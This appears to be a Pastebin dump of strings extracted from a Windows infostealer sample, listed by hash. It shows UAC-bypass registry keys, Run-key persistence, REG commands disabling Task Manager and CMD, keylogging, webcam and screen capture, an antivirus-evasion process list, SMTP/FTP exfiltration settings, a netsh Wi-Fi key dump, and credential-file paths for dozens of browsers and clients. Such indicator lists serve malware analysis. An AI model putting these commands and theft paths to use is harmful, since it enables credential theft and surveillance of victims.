Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Sample: 5bef6695ab6acdf941e1e7efef27941cb050256771a2b585d80716a673a1b938
- ---------
- Software\\Classes
- ms-settings\\shell\\open\\command
- Software\\Classes\\ms-settings\\shell\\open\\command
- DelegateExecute
- C:\\Windows\\System32\\computerdefaults.exe
- Software\\Classes\\ms-settings\\shell
- open\\command
- mscfile\\shell\\open\\command
- C:\\Windows\\System32\\eventvwr.exe
- Software\\Classes\\mscfile\\shell
- IsInRole
- \\
- Windows 7
- Windows 8
- Windows 10
- \\temp.tmp
- 1
- %startupfolder%
- \\%insfolder%\\
- Software\\Microsoft\\Windows\\CurrentVersion\\Run
- %insregname%
- SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartupApproved\\Run
- Shutdown -r -t 5
- True
- Johnson
- Miller
- michael
- Abby
- Emily
- John
- Player
- playerf4
- C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe
- C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\MSBuild.exe
- root\\CIMV2
- SELECT * FROM Win32_VideoController
- SELECT * FROM Win32_Processor
- Name
- MB
- AdapterRAM
- Unknown
- WebCap
- \\CamCampture
- \\CamCampture\\webcam.jpeg
- /
- Webcam Capture From:
- <span style=font-family:Courier New;font-size:14px;font-style:normal;font-weight:bold;text-decoration:none;text-tra
- nsform:none;color:#000000;>Local Time :
- young@inquiry.space
- yyyy_MM_dd_HH_mm_ss
- Webcam_
- -
- _IP_Adress_
- _
- .jpeg
- \\ScreenShot
- \\ScreenShot\\screen.jpeg
- screenshots
- Screen Capture From:
- Screenshot_
- /log.tmp
- keylog
- [SavedLog (
- [Saved Log]
- Keystrokes From:
- </span>
- Saved_Log_From_
- .html
- <html><span style=font-family:Courier New;font-size:14px;font-style:normal;font-weight:bold;text-decoration:none;te
- xt-transform:none;color:#000000;>Local Time :
- </span></html>
- Keystrokes_
- update
- info
- uninstall
- Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows
- Load
- %ftphost%/
- %ftpuser%
- %ftppassword%
- STOR
- Length
- Write
- Close
- type={0}hwid={1}time={2}pcname={
- Port
- User
- PW
- CoreFTP
- Passwords Recovered From:
- Local Time :
- Password_Recoveries_
- </html>
- ^HJBanD5
- smtp.inquiry.space
- :Zone.Identifier
- %DownLink%
- /%filename%
- HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System
- EnableLUA
- 0
- REG add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
- REG add HKCU\\Software\\Policies\\Microsoft\\Windows\\System /v DisableCMD /t REG_DWORD /d 1 /f
- HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\System
- DisableCMD
- REG add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /v NoRun /t REG_DWORD /d 1 /f
- REG add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /v NoControlPanel /t REG_DWORD /d 1
- /f
- HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System
- DisableRegistryTools
- HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore
- DisableSR
- REG add HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /v NoFolderOptions /t
- REG_DWORD /d 1 /f
- REG add HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /v NoFolderOptions /t
- REG_DWORD /d 1 /f
- SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths
- MSCONFIG.EXE
- \\tmpG
- .tmp
- Length
- length must be > 0
- anubis
- a2servic
- ashWebSv
- hvk
- avgemc
- bdagent
- avp
- keyscrambler
- mbam
- ekrn
- egui
- npfmsg
- ollydbg
- outpost
- Wireshark
- mcagent
- mcuimgr
- clamauto
- cpf
- ewido
- FPAVServer
- SbieSvc
- antigen
- ccapp
- tmlisten
- pccntmon
- earthagent
- spysweeper
- %filter_list%
- p=
- %PostURL%
- Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)
- POST
- +
- %2B
- application/x-www-form-urlencoded
- http://checkip.dyndns.org/
- \\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}
- &
- &
- <
- <
- >
- >
- "
- "
- :
- ]<span style=font-style:normal;text-decoration:none;text-transform:none;color:#000000;> (
- False
- <font color=#008000>{BACK}</font>
- </font>
- <font color=#008000>{ALT+TAB}</font>
- <font color=#008000>{ALT+F4}</font>
- <font color=#008000>{TAB}</font>
- <font color=#008000>{ESC}</font>
- <font color=#008000>{Win}</font>
- <font color=#008000>{CAPSLOCK}</font>
- <font color=#008000>↑</font>
- <font color=#008000>↓</font>
- <font color=#008000>←</font>
- <font color=#008000>→</font>
- <font color=#008000>{DEL}</font>
- <font color=#008000>{END}</font>
- <font color=#008000>{HOME}</font>
- <font color=#008000>{Insert}</font>
- <font color=#008000>{NumLock}</font>
- <font color=#008000>{PageDown}</font>
- <font color=#008000>{PageUp}</font>
- <font color=#008000>{ENTER}</font>
- <font color=#008000>{F1}</font>
- <font color=#008000>{F2}</font>
- <font color=#008000>{F3}</font>
- <font color=#008000>{F4}</font>
- <font color=#008000>{F5}</font>
- <font color=#008000>{F6}</font>
- <font color=#008000>{F7}</font>
- <font color=#008000>{F8}</font>
- <font color=#008000>{F9}</font>
- <font color=#008000>{F10}</font>
- <font color=#008000>{F11}</font>
- <font color=#008000>{F12}</font>
- control
- <font color=#008000>{CTRL}</font>
- .lnk
- WScript.Shell
- CreateShortcut
- TargetPath
- cmd.exe
- WorkingDirectory
- Arguments
- /c start
- " "
- &start;
- & exit
- IconLocation
- Save
- .lnk
- &explorer; /root,"%CD%
- " & exit
- %SystemRoot%\\system32\\SHELL32.dll,3
- Software\\Classes\\
- OpenSubKey
- GetValue
- \\DefaultIcon\\
- ,
- ,0
- None
- win32_processor
- processorID
- WinMgmts:
- InstancesOf
- Win32_BaseBoard
- SerialNumber
- x2
- origin_url
- username_value
- password_value
- \\Google\\Chrome\\User Data\\
- Profile
- Default
- \\Login Data
- Chrome
- logins
- Opera Software\\Opera Stable\\Login Data
- Opera
- Yandex\\YandexBrowser\\User Data\\Default\\Login Data
- Yandex
- firefox
- logins.json
- \\"(hostname|encryptedPassword|encryptedUsername)":"(.*?)"
- firefox
- temp
- .exe
- firefoxf4
- @@@
- IELibrary
- IELibrary.InternetExplorer
- GetSavedPasswords
- URL
- UserName
- Password
- Browser
- \\Common Files\\Apple\\Apple Application Support\\plutil.exe
- \\Apple Computer\\Preferences\\keychain.plist
- seamonkey
- seamonkey
- Comodo\\Dragon\\User Data\\Default\\Login Data
- Comodo Dragon
- MapleStudio\\ChromePlus\\User Data\\Default\\Login Data
- CoolNovo
- Chromium\\User Data\\Default\\Login Data
- SRWare Iron
- Torch\\User Data\\Default\\Login Data
- Torch Browser
- UCBrowser\\
- *
- Login Data
- journal
- UC Browser
- wow_logins
- PopPassword
- SmtpPassword
- Software\\IncrediMail\\Identities\\
- \\Accounts_New
- EmailAddress
- SmtpServer
- incredimail
- HKEY_CURRENT_USER\\Software\\Qualcomm\\Eudora\\CommandLine
- current
- Settings
- SavePasswordText
- ReturnAddress
- Eudora
- thunderbird
- signons.sqlite
- moz_logins
- hostname
- encryptedUsername
- encryptedPassword
- thunderbird
- postbox
- postbox
- flock
- signons3.txt
- ---
- .
- Flock Browser
- netsh
- wlan show profile
- All User Profile
- All User Profile * : (?<profile>.*)
- Profile
- Wi-Fi
- wlan show profile name="
- " key=clear
- Key Content * : (?<password>.*)
- Password
- No Password!
- ALLUSERSPROFILE
- \\\\
- DynDNS\\Updater\\config.dyndns
- username=
- =
- password=
- &H;
- t6KzXhCh
- http://DynDns.com
- DynDNS
- \\FileZilla\\recentservers.xml
- <Server>
- <Host>
- </Host>
- :
- <Port>
- </Port>
- <User>
- </User>
- <Pass encoding="base64">
- </Pass>
- <Pass>
- FileZilla
- SOFTWARE\\\\Martin Prikryl\\\\WinSCP 2\\\\Sessions
- hostname
- PublicKeyFile
- PortNumber
- 22
- [PRIVATE KEY LOCATION: "{0}"]
- WinSCP
- UserName
- All Users
- \\FlashFXP\\3quick.dat
- IP=
- port=
- user=
- pass=
- created=
- FlashFXP
- SystemDrive
- \\FTP Navigator\\Ftplist.txt
- Server
- No Password
- FTP Navigator
- Programfiles(x86)
- programfiles
- \\jDownloader\\config\\database.script
- Programfiles(x86)
- INSERT INTO CONFIG VALUES('AccountController','
- sq
- .
- t
- xt
- JDownloader
- Software\\Paltalk
- HKEY_CURRENT_USER\\Software\\Paltalk\\
- pwd
- http://Paltalk.com
- Paltalk
- \\.purple\\accounts.xml
- <account>
- <protocol>
- </protocol>
- <name>
- </name>
- <password>
- </password>
- Pidgin
- \\SmartFTP\\Client 2.0\\Favorites\\Quick Connect\\
- SmartFTPClient 2.0FavoritesQuick Connect*.xml
- <password>
- </password>
- <name>
- </name>
- SmartFTP
- APPDATA
- \\Ipswitch\\WS_FTP\\Sites\\ws_ftp.ini
- Host
- UID
- pwd
- WS_FTP
- PWD=
- Substring
- Password decryption failed!
- Key
- Mode
- IV
- Padding
- CreateDecryptor
- HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\FTP Commander\\UninstallString
- uninstall.exe
- Ftplist.txt
- ;Server=
- ;Port=
- ;Password=
- ;User=
- ;Anonymous=
- Name=
- FTPCommander
- HKEY_LOCAL_MACHINE\\SOFTWARE\\Vitalwerks\\DUC
- HKEY_CURRENT_USER\\SOFTWARE\\Vitalwerks\\DUC
- UserName
- http://no-ip.com
- NO-IP
- Input text must be a multiple of 4 characters!
- +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
- Input contains illegal character '
- '!
- \\The Bat!
- \\Account.CFN
- TheBat
- Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676
- Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging
- Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676
- Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676
- Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676
- Email
- IMAP Password
- POP3 Password
- HTTP Password
- SMTP Password
- GetBytes
- SMTP Server
- Not found!
- Outlook
- HKEY_CURRENT_USER\\Software\\Aerofox\\FoxmailPreview
- Executable
- HKEY_CURRENT_USER\\Software\\Aerofox\\Foxmail\\V3.1
- FoxmailPath
- \\Storage\\
- \\mail\\
- \\VirtualStore\\Program Files\\Foxmail\\mail\\
- \\VirtualStore\\Program Files (x86)\\Foxmail\\mail\\
- \\Accounts\\Account.rec0
- \\Account.stg
- \\fox.temp
- Read
- Dispose
- POP3Host
- SMTPHost
- IncomingServer
- Account
- MailAddress
- POP3Password
- !empty!
- Foxmail
- 5A
- 71
- No Data!
- \\Opera Mail\\Opera Mail\\wand.dat
- opera:
- Opera Mail
- abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\\|';:,<>/?+=
- \\Pocomail\\accounts.ini
- POPPass
- SMTPPass
- SMTP
- PocoMail
- No Data!
- [
- ]
- ;
- <array>
- <dict>
- <string>
- </string>
- <data>
- </data>
- Safari Browser
- -convert xml1 -s -o "
- \\fixed_keychain.xml"
- A
- 10
- B
- 11
- C
- 12
- D
- 13
- E
- 14
- F
- 15
- ABCDEF
- PK11_GetInternalKeySlot
- PK11_FreeSlot
- ATOB_ConvertAsciiToItem_Util
- ATOB_ConvertAsciiToItem
- PK11SDR_Decrypt
- NSS_Shutdown
- PK11_Authenticate
- Programfiles(x86)
- \\Mozilla Firefox\\nss3.dll
- \\Mozilla Firefox\\
- programfiles
- \\Postbox\\nss3.dll
- \\Postbox\\
- \\Mozilla Thunderbird\\nss3.dll
- \\Mozilla Thunderbird\\
- \\SeaMonkey\\nss3.dll
- \\SeaMonkey\\
- \\Flock\\nss3.dll
- \\Flock\\
- \\vcruntime140.dll
- mozglue.dll
- nss3.dll
- NSS_Init
- Password could not decrypted.
- Copy
- \\Mozilla\\Firefox\\
- Path=([A-z0-9\\/\\.]+)
- profiles.ini
- \\Mozilla\\SeaMonkey\\
- \\Flock\\Browser\\
- \\Thunderbird\\
- (
- IndexOf
- UNIQUE
- table
- No Data
- RegRead
- Software\\DownloadManager\\Passwords\\
- EncPassword
- Internet Download Manager
Add Comment
Please, Sign In to add comment